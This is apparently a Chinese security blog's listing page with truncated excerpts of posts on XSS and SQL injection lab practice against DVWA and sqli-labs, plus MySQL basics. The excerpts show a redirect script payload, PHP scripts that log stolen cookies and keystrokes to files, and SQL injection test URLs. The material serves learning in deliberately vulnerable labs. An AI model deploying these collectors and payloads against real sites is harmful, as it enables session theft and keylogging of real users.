- 博客(6)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 XSS总结
xss理解1、简介xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。2、什么是xssxss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据3、xss的危害大吗?答:很大,是现在web中主流的攻击方式。4、xss攻击都可以导致哪些危害(1)钓鱼欺骗(2)网
2020-11-19 22:04:58
1461
2
翻译 XSS漏洞钓鱼
实验环境PHPstudyDVWA靶场实验步骤重定向钓鱼1、把当前页面重定向到一个钓鱼页面,例如重定向到百度,<script>document.location.href="http://baidu.com"</script>2、打开DVWA靶场选择(XSS)stored然后F12打开查看器,将输入限制值改的大一点插入代码则会重定向到百度页面...
2020-11-19 00:33:31
443
原创 利用XSS实现受害者的键盘记录
实验环境:PHPstudyDVWA靶场实验步骤:1、在www目录下创建一个名为keylog.php的文件,代码如下:<?php$file = fopen("key.txt","a");if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key);}?>2、进入DVWA靶机,级别调成low,选择(XSS)stored3、F12打开查看器,将输入限制值改的大一点4、将<scri
2020-11-17 23:36:04
224
原创 xss获取cookie登陆
实验环境:phpstudyDVWA靶场实验步骤1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下:<?php$file = fopen("1.txt","a");if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n");}?>2、进入DVWA靶机,级别调成low,选择(XSS)stored3、F12打开查看器,将值改的大一点4、将插入留言板中
2020-11-17 23:01:04
1001
原创 sqli-labs小游戏关(1-20)关详解
第一关第一关是联合查询注入判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据http://localhost/sqli-labs-master/Less-1/?id=1’ – -http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- -http://localhost/sqli-labs-master/Less-1/?id=1’
2020-10-22 16:38:48
897
2
原创 MySQL数据库
MySQL数据库的话是一个关系型的数据库,可以理解为是由数据表组成的,是一个存储数据的仓库。一个比较完整的数据库是由 数据表组成的,而创建数据表首先要创建数据库,然后再创建数据表,而在这过程中可能还需要修改数据库跟数据表中的内容,最后再查看、查找、利用这个数据库。那我们就可以用"增删改查"的这个方式来理解和记忆这个命令。增:包括数据库、数据表的创建跟数据的插入等。create database 数据库名; 创建数据库create table 数据表名 (id int(11),name va
2020-10-08 13:15:08
339
sqli-labs闯关小游戏21-65.docx
2020-10-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人